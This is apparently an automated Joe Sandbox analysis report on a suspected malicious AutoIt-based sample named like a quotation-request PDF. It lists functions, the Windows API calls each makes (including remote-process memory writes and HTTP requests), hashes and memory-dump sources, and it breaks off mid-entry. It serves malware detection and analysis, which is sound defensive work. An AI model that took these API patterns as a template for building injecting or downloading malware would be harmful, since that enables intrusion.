                                                                    • Opcode ID: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                                                    • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                    • Opcode Fuzzy Hash: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                                                    • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                    Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                      • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                      • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                      • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                      • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                    • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                    • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                    • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                    Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \$]$h
                                                                    • API String ID: 4104443479-3262404753
                                                                    • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                    • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                    • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                    • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                    Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                    • String ID: <$@
                                                                    • API String ID: 2417854910-1426351568
                                                                    • Opcode ID: 23a982fe15c137d7c48bd8774b96cc0308a15ae84031f3429ed6e3a66c4187d5
                                                                    • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                    • Opcode Fuzzy Hash: 23a982fe15c137d7c48bd8774b96cc0308a15ae84031f3429ed6e3a66c4187d5
                                                                    • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                    Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3705125965-3916222277
                                                                    • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                    • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                    • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                    • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                    Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                    • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                    • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem
                                                                    • String ID: 0
                                                                    • API String ID: 135850232-4108050209
                                                                    • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                    • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                    • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                    • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                    Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                    • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                    • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                    • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                    Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                    • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: AU3_GetPluginDetails
                                                                    • API String ID: 145871493-4132174516
                                                                    • Opcode ID: 49aae325781426d2cb5559c12b94001afea8abe48dc6c22cb0194f3c30cec496
                                                                    • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                    • Opcode Fuzzy Hash: 49aae325781426d2cb5559c12b94001afea8abe48dc6c22cb0194f3c30cec496
                                                                    • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                    Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 3375834691-2298589950
                                                                    • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                    • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                    • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                    • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                    Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: $<
                                                                    • API String ID: 4104443479-428540627
                                                                    • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                    • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                    • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                    • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                    Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID: \VH
                                                                    • API String ID: 1682464887-234962358
                                                                    • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                    • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                    • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                    • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                    Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID: \VH
                                                                    • API String ID: 1682464887-234962358
                                                                    • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                    • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                    • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                    • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                    Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID: \VH
                                                                    • API String ID: 1682464887-234962358
                                                                    • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                    • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                    • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                    • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                    Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: \VH
                                                                    • API String ID: 2507767853-234962358
                                                                    • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                    • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                    • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                    • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                    Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: \VH
                                                                    • API String ID: 2507767853-234962358
                                                                    • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
